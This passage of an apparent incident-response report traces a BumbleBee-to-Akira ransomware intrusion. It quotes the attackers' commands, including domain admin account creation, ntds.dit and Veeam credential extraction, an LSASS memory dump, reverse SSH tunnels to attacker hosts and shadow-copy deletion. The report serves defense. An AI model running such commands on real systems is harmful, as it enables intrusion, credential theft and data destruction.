infrastructure could dynamically serve various malicious packages. This pattern is a reliable pivot point for researchers on platforms like urlscan.io. Two separate waves of activity were observed, masquerading as various enterprise software suites to facilitate BumbleBee infections. Technical analysis revealed significant infrastructure overlap across both waves: all download gateways resolved to Hostinger (AS47583) and utilized a shared code-signing certificate issued to “LLC Vector.” Potentially Related Campaign In October 2025, Zscaler documented a parallel campaign targeting user searching for Ivanti VPN. This operation used SEO poisoning to lure victims to a fraudulent download page, delivering a trojanized MSI designed to exfiltrate saved VPN credentials. This campaign exhibited a near-identical tactical fingerprint to the BumbleBee waves, specifically: Delivery Mechanics: A consistent two-tier model leveraging Bing SEO poisoning and the specific /Get?q= URL parameter. Infrastructure Overlap: Passive DNS analysis confirms that the Ivanti gateways (netml[.]shop ,shopping5[.]shop ) utilized the same Hostinger staging IP (84.32.84.32) as the Wave 1 gateway,soft-server[.]online . Naming Conventions: The Ivanti campaign employed the same ftp. subdomain pattern observed throughout Wave 2. Despite the infrastructure overlap, several key operational divergences distinguish this activity from the BumbleBee waves: Payload: The campaign distributed a dedicated VPN credential stealer rather than the BumbleBee loader. Signature Attribution: The MSI is signed by a Chinese entity (Hefei Qiangwei Network Technology), deviating from the Russian-based “LLCs” observed in previous waves. C2 Architecture: Upon execution, the stealer beaconed to a hardcoded Azure IP (4.239.95[.]1:8080 ), bypassing the Domain Generation Algorithm (DGA) infrastructure characteristic of BumbleBee Waves 1 and 2. Swisscom The Swisscom linked BumbleBee intrusion originated from a management server, where an IT administrator navigated to ip-scanner[.]org. This impersonation site masqueraded as the official Advanced IP Scanner portal to lure users into downloading a malicious payload. Although the site content had changed by the time of analysis, forensic inspection of the DOM tree revealed residual strings and metadata explicitly tied to Advanced IP Scanner, confirming its previous role as a deceptive lookalike domain. Execution BumbleBee – ManageEngine-OpManager.msi After copying the malicious MSI from the network share to a server, the infection started with the execution of ManageEngine-OpManager.msi from the user’s desktop. Forensic telemetry confirmed explorer.exe as the parent process, validating that the file was manually launched by the user. This successful initial access was the direct result of the threat actor’s masquerading tactics, which effectively leveraged a high-fidelity decoy to deceive the administrator into authorizing the installation. The choice to impersonate a ManageEngine installer indicates a deliberate effort to target high-value users, such as IT staff and System Administrators. These accounts typically possess elevated privileges and are often subject to fewer restrictions than standard user profiles. Furthermore, targeting these roles increases the likelihood of execution on critical infrastructure, including file servers and domain controllers. Technical analysis of the ManageEngine-OpManager.msi payload revealed a revoked code-signing certificate issued to “LLC Resource+.” Tracking provided by certgraveyard.org shows that this signer has a history of signing BumbleBee-related malware. The ManageEngine-OpManager.msi installer dropped three distinct binaries into %TEMP%\ApplicationInstallationFolder_11. This setup was designed to facilitate DLL side-loading: ManageEngine_OpManager_64bit.exe : The legitimate software used as a decoy to avoid user suspicion. consent.exe : A legitimate Windows binary leveraged to initiate the execution chain. msimg32.dll : The BumbleBee first-stage loader, which is automatically loaded by the legitimate process to bypass security detections. Interestingly, the metadata of msimg32d.dll is dictionary-derived gibberish, which is a known BumbleBee builder pattern across waves. They are extremely useful as a YARA signature because the strings collide essentially nowhere in benign software. consent.exe and DLL Side-Loading The ManageEngine-OpManager.msi functioned as a dual-purpose installer. While it deployed the authentic OpManager software to satisfy user expectations, it simultaneously stages a DLL side-loading attack within the %APPDATA% directory. By placing a legitimate, signed Windows binary (consent.exe) in the same folder as a malicious msimg32.dll, the threat actor exploits the Windows DLL search order. When the staged consent.exe was executed, it prioritized loading the local, malicious msimg32.dll over the legitimate version residing in C:\Windows\System32. This allowed the BumbleBee loader to run within the memory space of a trusted Windows process, effectively masking its presence from many signature-based security tools. Analysis provided by tria.ge showed that consent.exe and the legitimate OpManager installer were dropped and executed by the malicious MSI. The Sigma rule System File Execution Location Anomaly was triggered since it looks for execution of commonly abused Windows built-in binaries (consent.exe) outside of their normal path; in this case, the binary executed from the victim’s AppData folder. Upon execution, consent.exe loaded the malicious msimg32.dll (the BumbleBee loader). The loader immediately checked the system locale GetSystemDefaultLocaleName() and compared it against a hard-coded list of 27 CIS-region locales (Russia, Ukraine, Belarus, etc.). If a match was found, the loader terminated via ExitProcess(). If the loader passed the geofencing check, it began querying numerous dynamically generated domain names associated with the BumbleBee malware family. Swisscomm – Bumblebee In the Swisscom intrusion, the user downloaded Advanced-IP-Scanner.msi directly to a management server. This installer functioned as a malicious wrapper. It successfully deployed the legitimate Advanced IP Scanner software to avoid raising suspicion while simultaneously dropping the BumbleBee loader. Following the MSI’s execution, the malware staged additional artifacts in the %TEMP% directory, establishing the initial foothold on the server while the administrator proceeded with the expected utility. The malicious payload was staged immediately after the user granted administrative privileges via the User Account Control (UAC) prompt. Static analysis of the BumbleBee DLL (msimg32) revealed several anomalous strings within its PE metadata. Specifically, the ‘Original Filename’ and ‘Description’ fields contained values inconsistent with the legitimate Windows library, serving as a key indicator of its malicious nature. Furthermore, the digital signature on the msimg32 DLL was traced to a certificate issued to a Russian-based entity. This mirrored the signing patterns observed in previous BumbleBee waves, suggesting a consistent supply chain for their malicious binaries. Adaptix C2- AdgNsy.exe Following the initial BumbleBee beacon, the loader retrieved and executed AdgNsy.exe. Forensic analysis identified this file as a renamed instance of the legitimate WAB.exe (Windows Address Book) utility. The attack used this binary for process injection: the loader executed the masqueraded WAB.exe and injected it with Adaptix shellcode. This resulted in an active Adaptix C2 HTTP beacon that, in this instance, utilized default configuration settings for its communication profile. Deeper analysis of this activity is covered in the Defense Evasion section. ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding OriginalFileName: WAB.EXE CommandLine: C:\Users\ \AppData\Local\AdgNsy.exe Following the establishment of the C2 channel, the threat actor initiated discovery and enumeration activities. Analysis of the process telemetry revealed a series of living-off-the-land commands used to map the environment: Host/User Discovery: whoami ,systeminfo ,quser Domain/Network Reconnaissance: nltest ,ping Furthermore, they leveraged the beacon for internal network scanning, signaling the start of lateral movement preparation within the victim infrastructure. Swisscom – Adaptix C2 In the Swisscom incident, a 40-minute dwell time preceded the deployment of an Adaptix C2 agent. The loader dropped an authentic version of the Windows Contacts utility into a user-writable folder to facilitate process injection. This mechanism was used to execute Adaptix C2 shellcode, initiating an outbound connection to 170.130.55[.]223. Persistence Domain Account Creation On the initial day of the intrusion, the threat actor moved to establish persistent administrative access by creating two new domain accounts via net.exe. The account names backup_DA and backup_EA were likely chosen to blend in with legitimate administrative naming conventions: net user backup_DA P@ssw0rd1234 /add /dom net user backup_EA P@ssw0rd1234 /add /dom Following creation, the threat actor immediately performed privilege escalation by adding the backup_EA account to the Enterprise Admins group, granting them the highest level of authority across the entire Active Directory forest: net group "enterprise admins" backup_EA /add /dom Services Following the initial compromise, the threat actor used RDP to pivot to two internal servers. The objective was to install RustDesk, which was subsequently registered as a Windows service. Administrator Account Manipulation On the second day of the intrusion, the threat actor engaged in account takeover across high-value assets. By executing net user administrator P@ssw0rd!, they established direct control over local administrative contexts on the file and backup servers. The operation culminated in the reactivation of the built-in Domain Administrator account on the primary domain controller. Swisscom In the Swisscom observed intrusion, the threat actor achieved persistence on a domain controller by installing the Cloudflare tunneling software as a Windows service, causing it to run automatically after the host rebooted. Cloudflared has multiple capabilities that are useful for threat actors: Bypasses firewalls and NAT by initiating outbound connections. Encrypts traffic using HTTPS, making inspection more difficult. Avoids the need for port forwarding by using reverse tunneling. Routes the traffic through Cloudflare, which appears legitimate and can evade detection. Requires minimal configuration and is easy to deploy. The installation was performed through a PowerShell script called 1.ps1, which downloaded the software and registered a new service for it. Based on the comments in the script and the strings output in the PowerShell console, it is likely that 1.ps1 was developed with generative AI tools. Privilege Escalation There were a limited number of privilege escalation techniques observed during this incident due to the threat actor obtaining a privileged session by compromising a domain admin in the first instance. Defense Evasion DLL Sideloading The BumbleBee loader established its initial foothold via DLL search order hijacking. The threat actor staged a malicious msimg32.dll file in a user-writable directory alongside a relocated copy of consent.exe (the legitimate Windows UAC binary). Upon execution of consent.exe, the operating system prioritized the local, malicious DLL over the authentic version in System32, triggering the loader’s execution. This hijacked execution flow was corroborated by Sysmon event logs, which captured the anomalous process creation and image loading. Static analysis using PEStudio confirmed that msimg32.dll is a legitimate, expected dependency of the consent.exe binary. The threat actor exploited this imported dependency to facilitate DLL side-loading. Process Injection The deployment of the Adaptix C2 agent was orchestrated through a multi-stage execution chain. The BumbleBee-controlled consent.exe process first dropped AdgNsy.exe to the local disk. The threat actor initiated execution via Windows Management Instrumentation (WMI). By using WMI to launch the binary, the threat actor ensured that AdgNsy.exe spawned under WmiPrvSE.exe. Immediately following execution, Sysmon Event ID 10 (ProcessAccess) recorded the BumbleBee-controlled consent.exe gaining a handle on the AdgNsy.exe process. The associated call trace provided critical evidence of process injection by revealing the specific memory addresses and API calls, such as ntdll.dll and kernelbase.dll leveraged by the loader to reflectively inject the Adaptix shellcode into the trusted process. C:\Windows\SYSTEM32\ntdll.dll+9f3b4|C:\Windows\System32\KERNELBASE.dll+2aafe|C:\Windows\System32\hasherezade_pussy.dll+1ae8f|C:\Windows\System32\hasherezade_pussy.dll+1aee8|C:\Windows\System32\hasherezade_pussy.dll+baca|C:\Windows\System32\hasherezade_pussy.dll+1214d|C:\Windows\System32\hasherezade_pussy.dll+12292d|C:\Windows\System32\KERNEL32.DLL+14ed0|C:\Windows\SYSTEM32\ntdll.dll+7e39b Memory analysis of the AdgNsy.exe process confirmed the presence of unbacked execution. Analysts identified a thread whose entry point originated outside of the known binary’s image space, an indicator of shellcode execution. Furthermore, the discovery of multiple private, non-image regions with Read/Write/Execute (RWX) protections provides conclusive evidence of injected code residing in memory. Scanning the memory of the hijacked AdgNsy.exe process revealed active C2 configuration strings and beaconing artifacts. Because these artifacts were not found during a static analysis of the AdgNsy.exe file, it is clear that the malicious code was injected post-execution. To further support these findings, consent.exe was executed alongside the malicious BumbleBee msimg32.dll via DLL sideloading in a controlled analysis environment, consistent with the observed execution behavior. During runtime, the memory analysis tool PE-sieve, developed by the malware analyst hasherezade, was executed against the live consent.exe process. This resulted in the identification and extraction of an anomalous, unmapped in-memory module dumped as hasherezade_pussy.dll. This module corresponds to the same DLL referenced in the previously observed Sysmon call trace. Subsequent analysis of hasherezade_pussy.dll indicated that it contained functionality related to environment and virtualization checks, encrypted payload handling, and process injection. Strings within the module reference multiple Win32 and NTAPI functions commonly used for process injection, supporting the hypothesis that shellcode was injected into AdgNsy.exe. File Deletion Forensic analysis of host telemetry revealed a pattern of secure file deletions intended to minimize the attack’s local footprint. By monitoring Sysmon Event ID 23, we identified the precise timestamps and file paths of the components removed by the threat actor, including the initial loaders and reconnaissance logs. Case variation in command execution The threat actor utilized command-line obfuscation by employing inconsistent, mixed-case strings for process execution. Invocations such as CmD.eXe and pOWerShELl.exE were likely used to evade case-sensitive detection signatures or rudimentary pattern-matching rules within security monitoring tools. Swisscom In the Swisscom incident, the threat actor attempted to neutralize endpoint security controls by employing a Bring Your Own Vulnerable Driver (BYOVD) attack. They deployed three potentially malicious or known-vulnerable drivers to the %TEMP% directory and registered them as new system services to gain kernel-level privileges: Service: mgdsrv | Path: ...\AppData\Local\Temp\rwdrv.sys Service: KMHLPSVC | Path: ...\AppData\Local\Temp\hlpdrv.sys Forensic evidence from the RecentApps registry artifact suggested these drivers were managed by high-confidence “AV-killer” utilities. Although the executables were deleted prior to acquisition, the GUI execution history tracked the following paths: C:\ProgramData\av_kill_new\icardagt\icardagt.exe C:\ProgramData\av_kill_old\mfpmp\mfpmp.exe Credential Access NTDS.dit On the second day, the threat actor utilized the high-privilege backup_EA account to access a domain controller via RDP. The objective was to perform offline credential harvesting by extracting the Active Directory database (ntds.dit). Using the native Windows utility wbadmin.exe, the threat actor created a volume shadow copy backup containing the ntds.dit file and the SYSTEM and SECURITY registry hives. These files were staged in C:\ProgramData, providing the threat actor with all the necessary components to crack domain-wide password hashes offline. wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include:C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY -quiet Following the backup, they were observed using Notepad to review the backup logs, likely verifying the integrity of the stolen data before exfiltration. Following this activity, the threat actor rotated between nine different accounts while conducting their operation. Veeam Credential Dump Despite already having domain admin privileges, the threat actor extracted the credentials stored in the Veeam PostgreSQL database present in the backup server. The query was executed four different times from two accounts: Interactive Access: Three queries were performed via RDP sessions, suggesting manual verification of the credentials. Automated Extraction: A final query was executed remotely via WMI, utilizing an encoded PowerShell script to invoke the psql.exe utility. C:\Program Files\PostgreSQL\15\bin\psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials" The WMI-based execution was spawned via WmiPrvSE.exe and used an encoded PowerShell command. ParentImage: WmiPrvSE.exe Image: C:\Windows\System32\cmd.exe CommandLine: cmd.exe /Q /c powershell.exe -e JABQAG8AcwB0AGcAcgB1AFMAcQBsAEUAeABlAB1AGMAIAAa9ACAA... The decoded script extracted the credentials and decrypted them using DPAPI, by handling both legacy Veeam password storage and newer versions using a hard-coded salt value. Remote LSASS Memory Dump On day three, the threat actor targeted three hosts for LSASS memory dumping using the comsvcs.dll MiniDump technique. The threat actor used an automated toolset to cycle through four distinct remote execution methods per host in rapid succession (approximately 50 seconds total): SMB: Service creation via svcctl . WMI: Remote process invocation. Scheduled Tasks: Remote task registration and triggering. DCOM: Lateral movement via the MMC20.Application object. Image: C:\Windows\System32\rundll32.exe CommandLine: rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 \Windows\Temp\ . full The memory dumps were staged in \Windows\Temp using randomized filenames and deceptive extensions. The specific filenames observed across the targeted hosts were G7wO.sys, U8Vfsh.docx, and AsaZQZDJz.avhdx. This behavior is a high-confidence match for the lsassy credential dumping utility. The tool’s IDumpMethod base class defaults to the exact sequential execution order observed in this incident: smb, wmi, task, then mmc. Furthermore, the observed extensions correspond directly to lsassy‘s hardcoded randomization list, and the use of \Windows\Temp aligns with the tool’s default staging directory. Under the hood, lsassy leverages the Impacket library for remote orchestration. The four observed execution methods correspond directly to specific Impacket modules: smbexec.py : Facilitates SMB service creation. wmiexec.py : Manages WMI remoting. atexec.py : Handles remote scheduled task registration. mmcexec.py : Executes via DCOM. Detailed forensic artifacts and detection strategies for these specific techniques are documented in SnapAttack’s technical analysis. Discovery Approximately five hours after initial access, the AdaptixC2 process (AdgNsy.exe) was executed on the beachhead host after which the threat actor performed hands‑on‑keyboard discovery. /c systeminfo /c nltest /dclist: /c whoami /groups /c nltest /domain_trusts /c nltest /dclist:REDACTED.lan /c ping -n 1 REDACTED.lan /c ping -n 1 REDACTED.lan (...) /c ping -n 1 REDACTED.lan /c ping -n 1 REDACTED.lan Shortly afterwards, a network scan was initiated from the AdgNsy.exe process, targeting common ports such as SMB, RDP and LDAP. The threat actor then executed more system and network discovery commands on the beachhead. /c quser /server:REDACTED.lan /c quser /server:REDACTED.lan /c dir C:\\programdata /c dir C:\\\\programdata /c nltest /dclist: /c nltest /domain_trusts /c nltest /dclist:REDACTED.lan /c net group domain admins /dom /c net group "domain admins" /dom /c whoami /groups /c ping -n 1 REDACTED.lan On day two of the intrusion, the threat actor established an RDP session to a domain controller using a newly created user and performed further discovery. systeminfo C:\Windows\system32\NOTEPAD.EXE C:\Windows\Logs\WindowsServerBackup\Backup-REDACTED.log net user adminiatrstor net user administrator net group domain admins /dom Approximately 30 minutes later, the threat actor initiated RDP sessions to two additional servers and queried the local administrator account on each using the command net user administrator On day three of the intrusion, the threat actor again logged into the domain controller, executed discovery commands, and then dropped a SoftPerfect Network Scanner binary (n.exe), which was executed to perform a network scan. ping -n 1 REDACTED.lan ping -n 1 REDACTED.lan quser The execution of SoftPerfect Netscan can be confirmed by both the SMB traffic as well as the creation of the file delete.me, which the tool does when testing a folder’s write-ability. After running the network scanner, the threat actor connected to a file server via RDP and ran a couple of discovery commands. systeminfo net user administrator Shortly after, they connected to a backup server using RDP and executed more discovery commands: net user administrator net group net user C:\Windows\system32\taskmgr.exe /4 quser net localgroup net localusers net localuser net localgroup administrators net accounts Returning to the domain controller, the threat actor enabled the domain administrator account and enumerated group memberships. net user administrator /active:yes /dom net group net group REDACTED /dom Approximately 40 minutes later, a PowerShell script was executed on the domain controller to enumerate Service Principal Names (SPNs) for specific services, resolve their hostnames to IP addresses, and write the result to spn.txt. The output was reviewed manually using Notepad. Shortly after, Invoke-Sharefinder was executed to enumerate accessible SMB shares. Invoke-ShareFinder is a reconnaissance utility designed to enumerate accessible network file shares (SMB) across a domain. It was originally developed as part of the PowerView module within the PowerSploit framework, but has since been integrated into numerous offensive projects. Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\programdata\shares.txt On day five, two days later, the same command was re-executed on the domain controller, with the results manually inspected via Notepad. Subsequently, the threat actor leveraged an RDP session from a RustDesk host to pivot to a child domain controller. Upon gaining access, the threat actor initiated a fresh phase of discovery, primarily utilizing native system utilities to map the new environment. "C:\Windows\system32\taskmgr.exe" /4 systeminfo Following that, the threat actor leveraged PowerShell to enumerate domain computers and user objects, query and export DNS zone data from a domain controller, identify accessible SMB shares, and run the same SPN enumeration script observed earlier in the intrusion. Get-ADComputer -Server 10.REDACTED -Filter * -Property * | Select-Object Enabled, Name, DNSHostName, IPv4Address, OperatingSystem, Description, CanonicalName, servicePrincipalName, LastLogonDate, whenChanged, whenCreated | export-csv -path C:\ProgramData\AdComputers.csv Get-ADUser -Server 10.REDACTED -Filter * -Properties * | Select-Object Enabled, CanonicalName, CN, Name, SamAccountName, MemberOf, Company, Title, Description, Created, Modified, PasswordLastSet, LastLogonDate, logonCount, Department, telephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail, HomeDirectory, homeMDB | export-csv -path C:\ProgramData\AdUsers.csv Get-DnsServerZone -ComputerName REDACTED.lan Export-DnsServerZone -Name "REDACTED.lan" -FileName "REDACTED.txt" Export-DnsServerZone -Name "REDACTED.lan" -FileName "REDACTED.lan.txt" Export-DnsServerZone -Name "TrustAnchors" -FileName "TrustAnchors.txt" Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\programdata\shares.txt The outputs from these discovery activities were manually reviewed. The threat actor then dropped and executed a SoftPerfect Network Scanner binary (n.exe) on the child domain controller to perform a network scan. Finally, additional net commands and pings were issued to validate connectivity and enumerate backup and file servers. Lateral Movement The primary vector for lateral movement was native Windows RDP, used both through standard application access and SSH RDP tunneling. By leveraging the elevated backup_EA account, the threat actor successfully accessed nearly every available RDP instance in the environment. While they eventually rotated through several compromised domain accounts to maintain mobility, the pivotal initial pivot was established from the beachhead host to the Domain Controller using the backup_EA credentials. Forensic evidence showed the creation of a reverse SSH tunnel, a tactic used to expose internal RDP sessions to an threat actor-controlled external server: ssh [email protected][.]150 -R *:10400 -p22 ssh [email protected][.]150 : Established a session with the threat actor’s remote C2 server. -R *:10400 : Configured a reverse port forward. This binded port10400 on the remote server to an internal resource. The wildcard (* ) ensured the tunnel listened on all remote interfaces, facilitating external access. -p22 : Specified the standard SSH port for the connection. Subsequent logs confirmed a successful connection bridge to the local RDP port (3389) via ssh.exe, effectively bypassing firewall restrictions to provide the threat actor with direct GUI access to the internal network. While performing authentication through this tunnel, we observed the following workstation names from the threat actor: WORK kali Swisscom Leveraging a compromised Domain Admin account, the threat actor performed lateral movement to the domain controller and various servers using multiple protocols, primarily RDP. The RDP sessions were established via a Cloudflare tunnel, which effectively obfuscated the threat actor’s origin. This was confirmed by Windows Event Logs (EVTX), which recorded connections originating from the local loopback address (::%16777216) or known threat actor-controlled servers. This specific IP artifact is a sign of RDP tunneling, as the connection is proxied through a local process rather than a remote network address. The following workstation names were identified as associated with the threat actor’s activity: DESKTOP-HPLM2TD DESKTOP-KLKBBTS SERVER kali Collection Multiple collection artifacts were observed throughout the incident. The threat actor used a combination of legitimate Windows utilities, well-known PowerShell modules such as Invoke-ShareFinder, and prebuilt collection scripts to compile and collect data on the environment. Automated Collection Scanning Automated scanning was observed that appeared to target typical credential and config data stores. This activity directly preceded installation and execution of FileZilla, so it is possible this data was the primary focus for exfiltration. Network share access logs (Event ID 5145) captured the threat actor systematically checking for credential and data storage in the following locations. Note that Event ID 5145 logs access attempts whether or not the target path exists, so this represents the threat actor’s enumeration efforts rather than confirmation that all directories were present: Credential Theft: Users\\Administrator\\AppData\\Roaming\\Microsoft\\Protect\\ (DPAPI master keys) Users\\Administrator\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\ (RSA private keys) Users\\Administrator\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\ (User certificates) Users\\Administrator\\AppData\\Local\\Microsoft\\Credentials\\ (Windows Credential Manager) Users\\Administrator\\AppData\\Roaming\\Microsoft\\Credentials\\ (Windows Credential Manager) Browser Data (Passwords, Cookies, Autofill): Users\\Administrator\\AppData\\Local\\Google\\Chrome\\User Data\\ Users\\Administrator\\AppData\\Local\\Microsoft\\Edge\\User Data\\ Users\\Administrator\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\ Users\\Administrator\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ Cloud Platform Credentials: Users\\Administrator\\.aws\\ (AWS credentials) Users\\Administrator\\AppData\\Roaming\\gcloud\\ (Google Cloud credentials) Users\\Administrator\\AppData\\Roaming\\Windows Azure Powershell\\ (Azure credentials) Users\\Administrator\\.azure\\ (Azure CLI credentials) Password Manager Applications: Users\\Administrator\\AppData\\Local\\1Password\\ Users\\Administrator\\AppData\\Local\\LastPass\\ Users\\Administrator\\AppData\\Local\\KeePass\\ Users\\Administrator\\AppData\\Roaming\\Dashlane\\ Users\\Administrator\\AppData\\Local\\Bitwarden\\ Users\\Administrator\\AppData\\Local\\RoboForm\\ Users\\Administrator\\AppData\\Local\\StickyPassword\\ Users\\Administrator\\AppData\\Local\\NordPass\\ Users\\Administrator\\AppData\\Local\\Enpass\\ Development/Source Code Directories: Users\\Administrator\\source\\repos\\ Users\\Administrator\\workspace\\ Users\\Administrator\\IdeaProjects\\ Users\\Administrator\\PycharmProjects\\ Users\\Administrator\\AndroidStudioProjects\\ Users\\Administrator\\Documents\\NetBeansProjects\\ Users\\Administrator\\Documents\\Xcode\\ Users\\Administrator\\CLionProjects\\ Users\\Administrator\\RubyMineProjects\\ Users\\Administrator\\Documents\\Qt\\ Users\\Administrator\\Documents\\CodeBlocks\\ Users\\Administrator\\RiderProjects\\ Users\\Administrator\\PhpStormProjects\\ Remote Access Tool: Users\\Administrator\\AppData\\Local\\mRemoteNG\\ (settings and connection configs) Users\\Administrator\\AppData\\Roaming\\mRemoteNG\\ (settings and connection configs) Other: Users\\Administrator\\AppData\\Roaming\\Notepad++\\backup\\ These were all identified by reviewing 5145 events on the file server. Command and Control The threat actor used BumbleBee, AdaptixC2 and RustDesk, in addition to a reverse SSH tunnel to establish connections to their C2 infrastructure. BumbleBee Immediately upon execution, the BumbleBee process attempted to connect to multiple DGA-generated domains. While several failed to resolve, successful connections were established with 188.40.187[.]145:443 and 109.205.195[.]211:443 using the domains ev2sirbd269o5j[.]org and 2rxyt9urhq0bgj[.]org respectively. The BumbleBee configuration was extracted from Tria.ge and verified through analysis of the running process and host artifacts. Throughout the intrusion, the malware persistently attempted connections to DGA domains identified in the configuration, eventually establishing communication with additional IP addresses, including 171.22.183[.]43. Approximately five hours post-initial execution, BumbleBee dropped AdgNsy.exe, which used code injection to initialize AdaptixC2 on the beachhead host. A concurrent spike in network traffic between the BumbleBee process and 109.205.195[.]211 indicates that this IP facilitated the payload download. AdaptixC2 AdaptixC2 is a relatively new open-source post-exploitation and adversarial emulation framework. Although originally designed for legitimate penetration testing, it is increasingly being leveraged by threat actors in malicious campaigns. Further technical details on the framework are available in this Unit42 analysis. The AdaptixC2 beacon, delivered via AdgNsy.exe on the beachhead host, maintained persistent command-and-control (C2) communication with 172.96.137[.]160 throughout the intrusion. Notably, there was a cessation of activity between days three and five, during which no beaconing was observed. The following graph illustrates the AdaptixC2 traffic patterns over the course of the intrusion. The IP address 172.96.137[.]160 was hosted by Shock Hosting. We were able to extract the configuration of the AdaptixC2 beacon, which validated the host artifacts discovered on the beachhead host. RustDesk On the second day, RustDesk was installed on two Windows servers and executed in system tray mode. "C:\Program Files\RustDesk\RustDesk.exe" --tray On day three, the threat actor re-entered the environment via RustDesk on a primary server. Although the RustDesk process was already resident in the system tray, a Windows Security Event 4624 was recorded, showing an interactive logon (Type 2) from the localhost address (127.0.0.1). This event was immediately followed by the execution of the RustDesk connection manager, confirming that the threat actor had established a remote desktop session to the endpoint. "C:\Program Files\RustDesk\RustDesk.exe" --cm Additionally, RustDesk logs on the host show clipboard and screen-sharing activity consistent with an interactive remote desktop session, lasting for several hours. Reverse SSH tunnel On day three, the threat actor performed lateral movement from the initial server to a domain controller via RDP. Once on the DC, the threat actor leveraged the built-in Windows SSH client to establish a reverse tunnel to a remote host, effectively proxying subsequent malicious activity through this encrypted channel. This same reverse SSH tunneling technique was later identified on a separate Windows server on day five. However, SSH traffic was only observed between the domain controller and the external IP on day three. We also tracked login activity to the domain controller from a Kali Linux host shortly following the creation of the reverse SSH tunnel. Swisscom observed the same technique; however, in this case, the threat actor accessed a different IP address: ssh -p22 [email protected][.]60 -R 5554 Exfiltration The first notable transfer occurred after the establishment of the first reverse SSH tunnel on a domain controller. Network flow analysis revealed approximately 2.5GB of data transferred from the domain controller to the threat actor controlled server at 193[.]242[.]184[.]150 over port 22. The transfer occurred over a concentrated time period shortly after the tunnel was established, consistent with bulk data exfiltration. Analysis of Windows Event ID 5145 logs on Domain Controller A revealed the threat actor accessed the domain’s SYSVOL share at the same time that we see the ~2.5GB transfer initiate, indicating that SYSVOL data was likely exfiltrated. SYSVOL contains Group Policy Objects, login scripts, and domain-wide configurations. By accessing SYSVOL, the threat actor would have gained visibility into the organization’s security posture and Active Directory infrastructure. FileZilla was the primary method of exfiltration during this intrusion with the initial transfer taking place on the third day, roughly 39 hours after initial access. After executing C:\\ProgramData\\FileZilla_3.68.1_win64_sponsored2-setup.exe, the threat actor proceeded to connect to 185[.]174[.]100[.]203:22 to exfiltrate data. No file compression or specific harvesting tactics were observed, so it is likely the threat actor was just indiscriminately exfiltrating files from network shares; perhaps based on the names of the files/folders. The only collection methods observed showed a big interest in user data and credential gathering, likely to either sell the data or to be used by the threat actor for additional follow-on attacks. While the source of the FileZilla installer could not be identified, we were able to surface file creation logs that show explorer.exe as the responsible process. Considering that RDP was used throughout this intrusion, and there were rdpclip executions just before FileZilla execution on the File Sever, it is likely this executable was transferred via RDP clipboard from the threat actor’s machine to the File Server. "_timestamp": REDACTED, "Image": C:\Windows\Explorer.EXE, "TargetFilename": C:\ProgramData\FileZilla_3.68.1_win64_sponsored2-setup.exe, "ProcessGuid": {7992d2de-71d7-6873-9387-010000000e00}, "message": File created: RuleName: - UtcTime: REDACTED ProcessGuid: {7992d2de-71d7-6873-9387-010000000e00} ProcessId: 10560 Image: C:\Windows\Explorer.EXE TargetFilename: C:\ProgramData\FileZilla_3.68.1_win64_sponsored2-setup.exe CreationUtcTime: REDACTED User: \Administrator Note that the naming of this FileZilla executable is not unusual and this is the expected naming convention used for their free version installers. Analysis of Zeek logs show that roughly 77GB of data was transferred out of the victim network via two unique sessions originating from FileZilla. As stated earlier in the collection section, at least a portion of this was user credential data. Review of FileZilla’s recentservers.xml log file shows the username Stark was used. Logon type 2 indicates the password is prompted and manually entered each time and is not saved locally. Protocol 1 confirms SFTP protocol was used. SSH Exfiltration Sessions to 185.174.100.203:22 Session 1: CTXU3p4hyiBMiOHgta (Data Transfer #1) Source: :60368 Destination: 185.174.100.203:22 (Ukraine, AS-COLOCROSSING) Timestamp: REDACTED Duration: 16,362 seconds (~4.5 hours) Data Transferred: 39,282,787,186 bytes (39.28 GB) Connection Details: Protocol: SSH over TCP State: RSTO (Connection established, originator aborted with RST) SSH Client: SSH-2.0-FileZilla_3.68.1 SSH Server: SSH-2.0-OpenSSH_for_Windows_9.8 Win32-OpenSSH-GitHub Session 2: C5YTxCs9PfDHuCQLd (Data Transfer #2) Source: :60367 Destination: 185.174.100.203:22 (Ukraine, AS-COLOCROSSING) Timestamp: REDACTED Duration: 16,733 seconds (~4.6 hours) Data Transferred: 41,177,980,833 bytes (41.77 GB) Connection Details: Protocol: SSH over TCP State: RSTO (Connection established, originator aborted with RST) SSH Client: SSH-2.0-FileZilla_3.68.1 SSH Server: SSH-2.0-OpenSSH_for_Windows_9.8 Win32-OpenSSH-GitHub Impact Data Encryption Approximately 44 hours after the initial compromise, the threat actor initiated the Akira ransomware deployment, beginning with the backup server. The binary, staged as C:\ProgramData\locker.exe, was executed using the following parameters: locker.exe -p=G:\ -n=15 . In this context, the -p flag defines the target encryption path, while -n determines the percentage of each file to be encrypted—a tactic often used to speed up the encryption process. On the file server, the threat actor uninstalled FileZilla, likely to remove evidence of exfiltration, before executing the ransomware locally. From the domain controller, the threat actor utilized remote execution flags to target and encrypt network shares, followed by several additional passes across various directories to maximize the impact of the deployment. The threat actor monitored encryption progress by reviewing log files generated by the ransomware. On day five, the threat actor re-entered the environment via RustDesk, pivoting to the child domain controller via RDP. Once positioned, the threat actor executed the ransomware binary 39 times on that specific domain controller. Shadow Copy Deletion The Akira ransomware binary automated the deletion of Volume Shadow Copies upon execution, leveraging WMI to trigger a PowerShell command. On every impacted host, each locker.exe instance was followed by a shadow copy deletion within approximately one second: powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" Swisscom Nine hours after gaining initial access, the threat actor initiated the ransomware deployment, beginning with the domain controller and subsequently propagating to additional servers. Prior to the encryption phase, the threat actor performed a coordinated service termination to ensure that database files and web services were unlocked and accessible for encryption. Using WMIC, they targeted every host listed in hosts1.txt to disable and terminate services associated with SQL and IIS: Service 